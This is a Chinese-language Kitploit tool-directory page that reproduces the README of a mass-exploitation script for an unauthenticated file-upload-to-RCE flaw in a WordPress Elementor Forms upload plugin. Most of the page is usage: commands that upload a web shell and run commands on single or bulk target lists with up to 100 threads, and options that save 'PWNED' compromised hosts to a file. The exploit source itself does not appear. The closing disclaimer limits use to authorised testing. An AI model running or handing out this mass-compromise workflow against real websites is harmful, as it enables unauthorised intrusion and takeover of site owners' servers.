Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-18351 — 针对 CVE-2026-18351 的大规模利用工具,该漏洞是 Elementor Forms <= 1.6.0 中未经身份验证的任意文件上传导致远程代码执行,具备被动探测、shell 上传和命令执行功能。 | Kitploit
工具/GitHubGitHub/johenlastgen-jlg/cve-2026-18351
漏洞扫描器漏洞利用脚本与自动化Web应用程序漏洞利用Web安全渗透测试远程访问工具Payload 开发
GitHubjohenlastgen-jlg/cve-2026-18351

CVE-2026-18351

针对 CVE-2026-18351 的大规模利用工具,该漏洞是 Elementor Forms <= 1.6.0 中未经身份验证的任意文件上传导致远程代码执行,具备被动探测、shell 上传和命令执行功能。

查看仓库
16小时29分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-18351

针对 CVE-2026-18351 的大规模利用工具 — Drag and Drop File Upload for Elementor Forms <= 1.6.0 中的未认证任意文件上传 → RCE。

致谢 johenlastgen | telegram @johenlastgen | 频道 @jlgnetworkredirect


功能特性

  • 被动漏洞探测(不上传文件)
  • 完整利用模式,包含 shell 上传与 RCE 确认
  • 支持单目标和批量目标
  • 支持多线程
  • 可配置的命令执行
  • 完整日志、仅漏洞、仅已攻陷输出文件
  • 请求超时配置

环境要求

无外部依赖 — 仅使用 Python 标准库。

root@kitploit:~
python3 --version  # 3.6+

使用方法

root@kitploit:~
# 单目标 — 仅被动检查(不上传)
python3 mass.py --url http://target.com --check

# 单目标 — 使用默认命令(id)进行利用
python3 mass.py --url http://target.com --cmd id

# 单目标 — 使用自定义命令进行利用
python3 mass.py --url http://target.com --cmd whoami

# 批量目标 — 被动检查
python3 mass.py --list targets.txt --threads 50 --check

# 批量目标 — 利用
python3 mass.py --list targets.txt --threads 50 --cmd id

# 批量目标 — 调整超时进行利用
python3 mass.py --list targets.txt --threads 100 --timeout 8 --cmd whoami

# 保存完整日志
python3 mass.py --list targets.txt --output results.txt

# 仅保存存在漏洞的目标
python3 mass.py --list targets.txt --output-vuln vuln.txt

# 仅保存已确认 RCE 的目标
python3 mass.py --list targets.txt --output-pwned pwned.txt

# 组合输出
python3 mass.py \
  --list targets.txt \
  --threads 50 \
  --cmd id \
  --output results.txt \
  --output-vuln vuln.txt \
  --output-pwned pwned.txt

选项

选项描述
--url单个目标 URL
--list FILE包含目标 URL 的文件(每行一个)
--check仅被动探测 — 不上传文件
--cmd CMD在 shell 上执行的命令(默认:id)
--threads N并发线程数(默认:20)
--timeout N每个请求的超时时间(秒)(默认:10)
--output FILE将完整日志保存到文件
--output-vuln FILE仅将存在漏洞的目标 URL 保存到文件
--output-pwned FILE仅将已确认 RCE 的目标保存到文件

输出状态

状态含义
PWNEDShell 已上传且 RCE 已确认
VULN-NO-EXEC上传被接受但 shell 执行失败
PATCHED上传被拒绝或未找到 nonce
ERROR网络或解析失败

targets.txt 格式

每行一个 URL。以 # 开头的行将被忽略。

root@kitploit:~
http://target1.com
https://target2.com
# this line is ignored
http://target3.com

免责声明

本项目仅供授权的安全评估、防御性安全研究和漏洞验证使用。

使用本软件即表示您确认已获得对目标系统进行评估的明确授权。未经授权访问计算机系统是被禁止的,并可能违反适用法律。

作者和贡献者不鼓励也不纵容对本项目的未经授权使用,并且对因其使用而导致的任何滥用、损害或法律后果不承担任何责任或义务。


作者

JohenLastGen — JLG NETWORK

下载工具